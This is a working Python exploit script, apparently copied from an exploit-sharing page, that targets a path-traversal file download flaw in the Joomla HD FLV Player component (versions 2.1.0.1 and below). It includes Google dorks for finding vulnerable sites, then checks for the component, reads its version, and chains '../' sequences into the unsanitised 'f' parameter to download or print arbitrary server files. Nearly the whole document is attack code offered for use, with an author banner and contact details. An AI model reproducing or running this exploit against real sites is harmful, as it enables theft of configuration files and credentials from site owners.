Remot HDFLV Exploit Code Source

1. #!/usr/bin/env python
2. #
3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
4. #
5. # Exploit Author : Mr.XSecr3t
6. #
7. # Vendor Homepage : http://www.hdflvplayer.net/
8. #
9. # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
10. #
11. # Dork google 1: inurl:/component/hdflvplayer/
12. # Dork google 2: inurl:com_hdflvplayer
13. #
14. # Date : 2016-1-2
15. #
16. # Tested on : BackBox 3.x/4.x
17. #
18. # Info:
19. # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
20. # The variable "f" is not sanitized.
21. # Over 80.000 downloads (statistic reported on official site)
22. #
23. #
24. # Video Demo : https://www.youtube.com/78c6d77dfXg
25. #
26. #
27. # Http connection
28. import urllib, urllib2
29. # String manipulation
30. import re
31. # Time management
32. import time
33. # Args management
34. import optparse
35. # Error management
36. import sys
37.  
38. banner = """
39. _______ __ ___ ___ ______
40. | _ .-----.-----.--------| .---.-. | Y | _ \\
41. |___| | _ | _ | | | _ | |. 1 |. | \\
42. |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
43. |: 1 | |: | |: 1 /
44. |::.. . | |::.|:. |::.. . /
45. `-------' `--- ---`------'
46. _______ ___ ___ ___ _______ __
47. | _ | | | Y | | _ | .---.-.--.--.-----.----.
48. |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
49. |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
50. |: | |: 1 |: 1 | |: | |_____|
51. |::.| |::.. . |\:.. ./ |::.|
52. `---' `-------' `---' `---'
53.  
54. <= 2.1.0.1 Remote File Download
55.  
56. Written by:
57.  
58. Mr.XSecr3t
59.  
60. https://www.facebook.com/vaniatufik
61.  
62. ICDT@grupcyber.com
63. anonn404notfound@gmail.com
64.  
65. https://www.facebook.com/groups/IndonesianCyberDarkNetTeam
66. """
67.  
68. # Check url
69. def checkurl(url):
70. if url[:8] != "https://" and url[:7] != "http://":
71. print('[X] You must insert http:// or https:// procotol')
72. sys.exit(1)
73. else:
74. return url
75.  
76.  
77. def checkcomponent(url,headers):
78.  
79. try:
80. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
81. sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
82. print("")
83. except urllib2.HTTPError:
84. sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
85. sys.exit(1)
86. except urllib2.URLError:
87. print '[X] Connection Error'
88.  
89. def checkversion(url,headers):
90.  
91. try:
92. req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
93. response = urllib2.urlopen(req).readlines()
94.  
95. for line_version in response:
96.  
97. if not line_version.find("<version>") == -1:
98.  
99. VER = re.compile('>(.*?)<').search(line_version).group(1)
100.  
101. sys.stdout.write("\r[+] Checking Version: "+str(VER))
102. print("")
103.  
104. except urllib2.HTTPError:
105. sys.stdout.write("\r[+] Checking Version: Unknown")
106.  
107. except urllib2.URLError:
108. print("\n[X] Connection Error")
109. sys.exit(1)
110.  
111. def connection(url,headers,pathtrav):
112.  
113. char = "../"
114. bar = "#"
115. s = ""
116. barcount = ""
117.  
118. for a in range(1,20):
119.  
120. s += char
121. barcount += bar
122. sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
123. sys.stdout.flush()
124.  
125. try:
126. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
127. response = urllib2.urlopen(req)
128.  
129. content = response.read()
130.  
131. if content != "" and not "failed to open stream" in content:
132. print("\n[!] VULNERABLE")
133. print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
134. print("")
135. print("[+] Mau Didownload apa di Read Cuk?")
136. print("[+]")
137. sys.stdout.write("\r[+] Mau Didownload apa di Read Cuk?: ")
138.  
139. download = set(['d'])
140. read = set(['r'])
141.  
142. while True:
143. choice = raw_input().lower()
144. if choice in download:
145. filedown = pathtrav.split('/')[-1]
146. urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
147. print("[!] Sip Deh KeDownload!")
148. print("[!] Check file: "+filedown)
149. return True
150. elif choice in read:
151. print("")
152. print content
153. return True
154. else:
155. sys.stdout.write("\r[X] lease respond with 'D' or 'R': ")
156.  
157. except urllib2.HTTPError:
158. #print '[X] HTTP Error'
159. pass
160. except urllib2.URLError:
161. print '\n[X] Connection Error'
162.  
163. time.sleep(1)
164. print("\n[X] Filenya ga ketemu Cuk -_- :(")
165.  
166. commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
167. commandList.add_option('-t', '--target', action="store",
168. help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
169. )
170. commandList.add_option('-f', '--file', action="store",
171. help="Insert file to check",
172. )
173. options, remainder = commandList.parse_args()
174.  
175. # Check args
176. if not options.target or not options.file:
177. print(banner)
178. commandList.print_help()
179. sys.exit(1)
180.  
181. print(banner)
182.  
183. url = checkurl(options.target)
184. pathtrav = options.file
185.  
186. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
187.  
188. sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
189. checkcomponent(url,headers)
190. sys.stdout.write("\r[+] Checking Version: ")
191. checkversion(url,headers)
192. sys.stdout.write("\r[+] Exploiting...please wait:")
193. connection(url,headers,pathtrav)